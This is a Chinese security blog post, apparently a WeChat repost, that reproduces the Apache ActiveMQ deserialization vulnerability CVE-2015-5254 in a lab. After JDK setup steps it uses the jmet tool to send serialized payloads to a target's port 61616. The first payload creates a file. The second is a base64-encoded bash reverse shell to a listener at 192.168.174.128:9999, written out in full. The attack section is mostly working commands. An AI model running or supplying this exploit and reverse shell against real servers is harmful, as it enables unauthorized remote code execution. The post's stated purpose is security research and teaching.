Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

admin 2024年10月21日22:55:47评论10 views字数 1700阅读5分40秒阅读模式
- 漏洞描述 -

Apache ActiveMQ是由美国Pachitea(Apache)软件基金会开发的一种开源消息中间件,它支持Java消息服务,集群,Spring框架等。

Apache ActiveMQ版本5.x之前的5.13.0安全漏洞,该程序引起的漏洞并不限制可以在代理中序列化的类。远程攻击者可以使特殊的序列化Java消息服务(JMS)ObjectMessage对象利用此漏洞来执行任意代码。

- 影响范围 -

Apache ActiveMQ 5.13.0之前5.x版本
- 环境配置 -
1.按照JDK

查看java版本,如果是java 11需要切换到java 8

java -version

安装java 8,默认安装路径/usr/lib/jvm/java-8-openjdk-amd64

sudo apt install openjdk-8-jdk

配置环境变量,添加jdk安装路径

sudo vim ~/.bashrc

# 在最后一行添加
export JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64

2.切换jdk版本

采用update-alternatives命令进行版本切换

/usr/bin/java和/usr/lib/jvm/java-8-openjdk-amd64/bin/java两个路径一定要和自己的路径吻合

sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjdk-amd64/bin/java 1070

切换jdk

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

sudo update-alternatives --config java

再次查看java版本,切换成功

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

- 漏洞复现 -

下载 jmet 下载链接

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external

对目标发送一个生成/tmp/vuln的 payload

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列,ID为kali-38087-1645421794512-1:1:1:1:1

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

点击这个信息触发文件创建,成功执行命令 touch /tmp/awesome_poc

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

可以利用反弹shell的payload

bash -i >& /dev/tcp/192.168.174.128/9999 0>&1  (base64编码)
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

# 发送payload
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

查看消息队列,ID为kali-38435-1645422155171-1:1:1:1:1

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

监听9999端口,点击消息队列会触发命令执行,反弹Shell

Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

原文始发于微信公众号(安全攻防渗透):知识分享20:Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日22:55:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)https://cn-sec.com/archives/1861104.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息